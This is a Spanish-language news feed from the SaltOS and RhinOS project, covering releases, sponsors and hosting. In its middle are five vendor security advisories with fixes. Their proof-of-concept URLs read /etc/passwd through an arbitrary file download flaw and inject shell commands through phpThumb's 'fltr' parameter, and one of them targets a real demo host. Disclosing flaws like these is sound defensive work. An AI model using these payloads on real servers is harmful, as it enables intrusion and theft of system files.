Se ha publicado otro caso de éxito de SaltOS en el site de MariaDB: http://kb.askmonty.org/en/saltos-sees-gains-with-subqueries-in-mariadb/
Tras estar desarrollando varias aplicaciones que usan MySQL, me he dado cuenta que es muy ineficiente cuando las tablas tienen muchos registros y las consultas tienen varios joins y subqueries. Más info en: ¿Porque usar MariaDB en lugar de MySQL?
He recibido un correo electrónico con el texto siguiente: "Exploit found. hey fucking script kiddies, write good scripts... god damn it. http://packetstormsecurity.org/files/115855" De "Hans Wurst" mediante el formulario de contacto de la web.
Como yo no sé cómo ponerme en contacto con él porque no ha puesto una dirección de correo electrónico real, quiero preguntarle desde aquí: ¿eres un programador?, ¿has hecho alguna aportación a la sociedad? considero que su correo electrónico como prepotente.
Ahora que ya dispongo de un equipo con PHP 5.4, he podido hacer los tests, aplicar los cambios y hacer las mejoras necesarias en el código para que SaltOS funcione correctamente en PHP 5.4. Podeis descargarlo desde el nightly de esta misma noche.
RaCaMeT ha tenido que dejar el VPS que tenia contratado y por ese motivo, he tenido que mover todo el entorno de demos a mi servidor personal. Desde los proyecto SaltOS y RhinOS quiero decir: gracias RaCaMeT por estos meses de hosting gratuito.
Como ya anuncie hace unos días, podeis descargar la version nightly de SaltOS desde sourceforge: http://sourceforge.net/projects/saltos/files/nightly/
Esta mañana he detectado un bug en una librería que uso frecuentemente y al notificarla al autor, me ha respondido "pues no haga eso". Si quereis ver todo el hilo, ir a https://github.com/rgrove/jsmin-php/issues/14
Como mucha gente me pregunta acerca de cómo se puede descargar la última versión de SaltOS (es decir, la que tengo en desarrollo), voy a publicar una versión nocturna cada noche con todos los cambios actuales. En breve lo tendré montado públicamente.
La empresa ABCustom, empresa que desde hace tiempo usa SaltOS en su gestión interna, ha decidido agradecerme el esfuerzo que hago con el proyecto cediendome una mesa de trabajo ubicada en una de sus oficinas de Barcelona. También he podido dejar el servidor de subversion, que uso para el control de versiones, conectado a internet de alta velocidad. Realmente es gratificante ver que la rueda gira.
Advisory:
- HSV-2012-0005
Time Line:
- Detection Date: 22/03/2012
- Notification Date: 22/03/2012
- Fix Date: 22/03/2012
- Disclosure Date: 22/03/2012
Name:
- Arbitary File Download in RhinOS v3.0
Afected Versions:
- SaltOS v3.0 r1238 and previous
References:
- CVE ID: N/A
- Bugtraq ID: N/A
- OSVDB ID: N/A
Descriptión:
- Authenticated users can download any file from the server where RhinOS is instaled
POC / Exploit:
- http://www.example.com/admin/inicio.php?include=php/download.php&name=passwd.txt&file=/etc/passwd
Solution:
- Update the version of RhinOS v3.0 to r1247 or later
Advisory:
- HSV-2012-0001
Time Line:
- Detection Date: 14/03/2012
- Notification Date: 15/03/2012
- Fix Date: 16/03/2012
- Disclosure Date: 16/03/2012
Name:
- Information Disclosure in SaltOS v3.1
Afected Versions:
- SaltOS v3.1 r5100 and previous
References:
- CVE ID: CVE-2010-1598
- Bugtraq ID: 39605
- OSVDB ID: 63939
Descriptión:
- is possible to obtain information about the server through the library phpthumb.php
POC / Exploit:
- http://www.example.com/code/lib/phpthumb/phpThumb.php?phpThumbDebug=9
Solution:
- Change the value of "$PHPTHUMB_CONFIG['disable_debug']= false;" to "$PHPTHUMB_CONFIG['disable_debug']= true;" in phpThumb.config.php, or update to the version of SaltOS to r5104 or latter
========================================================================================================================
Advisory:
- HSV-2012-0002
Time Line:
- Detection Date: 14/03/2012
- Notification Date: 15/03/2012
- Fix Date: 16/03/2012
- Disclosure Date: 16/03/2012
Name:
- Command Injection in SaltOS v3.1
Afected Versions:
- SaltOS v3.1 r5100 and previous
References:
- CVE ID: CVE-2010-1598
- Bugtraq ID: 39605
- OSVDB ID: 63939
Descriptión:
- is possible to run commands in the server through the 'fltr' parameter in the library phpthumb.php
POC / Exploit:
- http://racamet.saltos.net/code/lib/phpthumb/phpThumb.php?fltr=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg ; ls -la ;cat /etc/passwd; & src=file.jpg & phpThumbDebug=9
Solution:
- Change the value of "$PHPTHUMB_CONFIG['disable_debug']= false;" to "$PHPTHUMB_CONFIG['disable_debug']= true;" in phpThumb.config.php, or update to the version of SaltOS to r5104 or latter
========================================================================================================================
Advisory:
- HSV-2012-0003
Time Line:
- Detection Date: 14/03/2012
- Notification Date: 15/03/2012
- Fix Date: 16/03/2012
- Disclosure Date: 16/03/2012
Name:
- Information Disclosure in RhinOS v3.0
Afected Versions:
- SaltOS v3.0 r1238 and previous
References:
- CVE ID: CVE-2010-1598
- Bugtraq ID: 39605
- OSVDB ID: 63939
Descriptión:
- is possible to obtain information about the server through the library phpthumb.php
POC / Exploit:
- http://www.example.com/code/lib/phpthumb/phpThumb.php?phpThumbDebug=9
Solution:
- Change the value of "$PHPTHUMB_CONFIG['disable_debug']= false;" to "$PHPTHUMB_CONFIG['disable_debug']= true;" in phpThumb.config.php, or update to the version of RhinOS to r1241 or latter
========================================================================================================================
Advisory:
- HSV-2012-0004
Time Line:
- Detection Date: 14/03/2012
- Notification Date: 15/03/2012
- Fix Date: 16/03/2012
- Disclosure Date: 16/03/2012
Name:
- Command Injection in RhinOS v3.0
Afected Versions:
- SaltOS v3.0 r1238 and previous
References:
- CVE ID: CVE-2010-1598
- Bugtraq ID: 39605
- OSVDB ID: 63939
Descriptión:
- Is possible to run commands in the server through the 'fltr' parameter in the library phpthumb.php
POC / Exploit:
- http://www.example.com/code/lib/phpthumb/phpThumb.php?fltr=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg ; ls -la ;cat /etc/passwd; & src=file.jpg & phpThumbDebug=9
Solution:
- Change the value of "$PHPTHUMB_CONFIG['disable_debug']= false;" to "$PHPTHUMB_CONFIG['disable_debug']= true;" in phpThumb.config.php, or update to the version of RhinOS to r1241 or latter
Gracias a RaCaMeT, podreis disfrutar de un VPS con 8 nucleos, 3Gb de RAM y 100Gb de NAS conectados con una conexión rápida a internet para probar SaltOS y RhinOS.
Tras hacer unas mejoras en el sistema de captcha, el servicio de demos quedo fuera de servicio impidiendo la creación de demos. El error se acaba de detectar y solucionar, y todo ha vuelto a la normalidad. Lo siento por las molestias, pero estoy haciendo mejoras para evitar el molesto spam dentro del foro.
Dinahosting ha confirmado hoy que continuará con el patrocinio por un año más a los proyectos Saltos y RhinOS, dando un hosting linux gratuito para el sitio web del proyecto. Como siempre a todos los que colaboran con estos proyectos: Gracias.
Por cierto, estoy buscando un proveedor de housing que me permita poner una torre de ordenador donde actualmente se ejecutan las demos de SaltOS y RhinOS.
Jordi Company y Andrés Diaz, me han regalado un servidor para sustituir al viejo equipo que tenia en mi casa para el entorno de demos de SaltOS y RhinOS. Las especificaciones de la nueva máquina son las siguientes:
Buenos días seguidores de SaltOS y RhinOS. Como ya anuncie la anterior semana, acabo de subir a sourceforge los nuevos paquetes con las mejoras comentadas, así como algunas actualizaciones de librerias de terceros.